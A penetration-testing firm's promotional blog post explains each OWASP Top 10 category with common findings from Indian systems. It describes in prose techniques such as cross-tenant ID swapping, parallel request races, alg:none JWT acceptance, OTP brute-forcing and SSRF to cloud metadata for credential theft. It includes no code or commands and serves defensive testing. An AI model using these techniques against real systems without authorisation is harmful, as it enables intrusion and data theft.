The OWASP Top 10 is the most widely-referenced web application security list on Earth. Indian regulators cite it. Indian RFPs require coverage of it. ISO 27001 auditors ask which categories your last test addressed. Here is the current list, explained with the kinds of bugs we keep finding in Indian production systems.
- A01 — Broken Access Control
- A02 — Cryptographic Failures
- A03 — Injection
- A04 — Insecure Design
- A05 — Security Misconfiguration
- A06 — Vulnerable and Outdated Components
- A07 — Identification and Authentication Failures
- A08 — Software and Data Integrity Failures
- A09 — Security Logging and Monitoring Failures
- A10 — Server-Side Request Forgery (SSRF)
A01 — Broken Access Control
Still the leader. The 2025 data shows broken access control in 94% of tested applications. In Indian engagements, we see it most often as IDOR — a sequential or guessable identifier in a URL or API request that, when changed, returns another tenant's data. Indian SaaS products and fintech APIs are particularly exposed because most ORMs make "fetch by ID" look identical regardless of who is asking.
Test by enumerating every authenticated endpoint with two user accounts in two different tenants, swapping IDs, and watching for HTTP 200 instead of 403.
A02 — Cryptographic Failures
Renamed from "Sensitive Data Exposure". The category covers data at rest, data in transit, and the keys that protect both.
The classics we still find on Indian production: HTTP login pages, expired or self-signed certs on internal admin panels, AES-ECB mode in custom token formats, hard-coded keys in mobile apps, password fields stored as SHA-1 or MD5 with no salt, and PAN/Aadhaar in JSON responses where the same endpoint truncated it for display.
A03 — Injection
SQL injection is no longer the daily find it was a decade ago — parameterised queries won. What is alive and well: NoSQL injection in MongoDB query objects, LDAP injection in custom enterprise SSO, XPath injection in XML-based SOAP services still common in Indian government tenders, and command injection in any feature that calls os.system on user input — usually file conversion or PDF generation features.
A04 — Insecure Design
The category that punishes architecture, not code. The Indian classic: a "forgot password" flow that resets to an OTP sent over SMS without any rate-limit, account-lockout, or replay protection. The flow is implemented correctly. The flow itself is the bug.
The other Indian classic: discount-coupon endpoints with no atomicity guarantees, where a fast HTTP client racing 50 requests in parallel earns the user 50 discounts before the database catches up.
A05 — Security Misconfiguration
The biggest category by surface area. Default credentials on Jenkins, Tomcat, RabbitMQ management ports, MongoDB on 0.0.0.0 with no auth, S3 buckets readable to AllUsers, Kubernetes dashboards on a public LoadBalancer, and Spring Boot Actuator endpoints accessible without auth — which on Indian B2B SaaS estates is shockingly common.
A06 — Vulnerable and Outdated Components
Log4j 2.x below 2.17 is still in Indian production. Spring4Shell. Apache Struts. Old jQuery on customer-facing pages with known prototype pollution. WordPress plugins three majors behind. The fix is an SBOM and a patching SLA — but the find is a npm audit or retire.js output in the report.
A07 — Identification and Authentication Failures
Password policies that allow Password123. JWT signatures with alg:none still accepted. Session IDs in URLs. Forgot-password tokens valid for a week. SMS OTP brute-forceable because the lockout is on the client. We see at least one of these in roughly half of Indian web engagements.
A08 — Software and Data Integrity Failures
Insecure deserialization (Java readObject, Python pickle, .NET BinaryFormatter), trusting npm packages without lockfiles, CI/CD pipelines pulling Docker images by :latest tag from public registries. The supply-chain category. Underrated and very, very common.
A09 — Security Logging and Monitoring Failures
Most Indian businesses we audit have logging. Few have monitoring. Fewer have alerting tied to a SOC or a person who would notice at 02:30 IST. The OWASP test is: "If we performed the most obvious attack of the last hour, would your team know?" The answer is almost always no.
A10 — Server-Side Request Forgery (SSRF)
The most upward-trending category. Any feature that fetches a URL on behalf of the user is a candidate — image proxies, link previews, webhook senders, OEmbed handlers, PDF-to-image converters. Combined with cloud metadata endpoints (169.254.169.254 on AWS/GCP/Azure), an SSRF promotes to an instance credential theft and then to full cloud takeover.
This is the bug our team has used most often in Indian engagements over the last 18 months to demonstrate critical impact from a "minor" feature.
When an ISO 27001 auditor asks "how did you address OWASP Top 10?", the right answer is a VAPT report that maps each finding to a category — and the categories with zero findings are explicitly listed as tested-and-clean. Our reports do this by default.
If you have not tested against the 2025 list yet, the relevant service pages are web application VAPT and API security testing. For the test plan we use, see the 47-test checklist.
Need a VAPT engagement scoped against this?
Tell us the asset and the compliance overlay. We will come back with a scope, timeline, and fixed-fee quote within 24 hours. Engagements start at USD 500. Free retest included.
Book a 20-minute call →BERRY9 IT SERVICES — VAPT Practice
Hyderabad-based ISO 27001 + 9001 certified offensive-security team. Since 2015 we have run 500+ engagements for 100+ clients across pharma, BFSI, healthcare, VFX, and enterprise SaaS. Every engagement includes a free retest.